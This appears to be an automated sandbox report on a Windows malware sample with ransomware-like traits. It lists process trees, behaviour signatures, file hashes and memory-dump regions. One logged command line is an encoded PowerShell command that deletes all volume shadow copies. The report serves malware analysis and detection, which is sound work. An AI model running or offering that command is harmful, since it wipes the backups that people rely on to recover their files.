Process | C:\Users\Admin\AppData\Local\Temp\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
Command line | "C:\Users\Admin\AppData\Local\Temp\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe" |
Signatures | Modifies system executable filetype association; Loads dropped DLL; Drops file in Program Files directory; Drops file in Windows directory; Modifies registry class; Suspicious use of WriteProcessMemory |
-
Process | C:\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
Command line | "C:\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe" |
Signatures | Executes dropped EXE; Modifies extensions of user files; Adds Run key to start application; Enumerates connected drives; Drops file in System32 directory; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory |
-
Process | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Command line | powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA== |
Signatures | Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken |
-
Process | C:\Windows\system32\wbem\unsecapp.exe |
Command line | C:\Windows\system32\wbem\unsecapp.exe -Embedding |
-
Process | C:\Windows\system32\vssvc.exe |
Command line | C:\Windows\system32\vssvc.exe |
Signatures | Suspicious use of AdjustPrivilegeToken |
-
C:\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
MD5 | a055246b0e804eb3a1dda52937f556ef |
SHA1 | 6807425e1252f1154664fc8072dde03558ed35fe |
SHA256 | a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3 |
SHA512 | 18b2308905d95dff7a2a3e2cd3559325d6e3cfdeb45c48e3fd6df0fdbaee27ea3e191cc344505ad2e32f4136de6c8d2b2bbbac121486002707f1a617e2a49a95 |
-
\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
MD5 | 9e2b9928c89a9d0da1d3e8f4bd96afa7 |
SHA1 | ec66cda99f44b62470c6930e5afda061579cde35 |
SHA256 | 8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043 |
SHA512 | 2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156 |
-
\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
MD5 | a055246b0e804eb3a1dda52937f556ef |
SHA1 | 6807425e1252f1154664fc8072dde03558ed35fe |
SHA256 | a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3 |
SHA512 | 18b2308905d95dff7a2a3e2cd3559325d6e3cfdeb45c48e3fd6df0fdbaee27ea3e191cc344505ad2e32f4136de6c8d2b2bbbac121486002707f1a617e2a49a95 |
-
memory/1520-62-0x0000000002462000-0x0000000002464000-memory.dmp
-
memory/1520-59-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
-
memory/1520-63-0x0000000002464000-0x0000000002467000-memory.dmp
-
memory/1520-60-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
-
memory/1520-64-0x000000001B750000-0x000000001BA4F000-memory.dmp
-
memory/1520-65-0x000000000246B000-0x000000000248A000-memory.dmp
-
memory/1520-61-0x0000000002460000-0x0000000002462000-memory.dmp
-
memory/1588-54-0x0000000076151000-0x0000000076153000-memory.dmp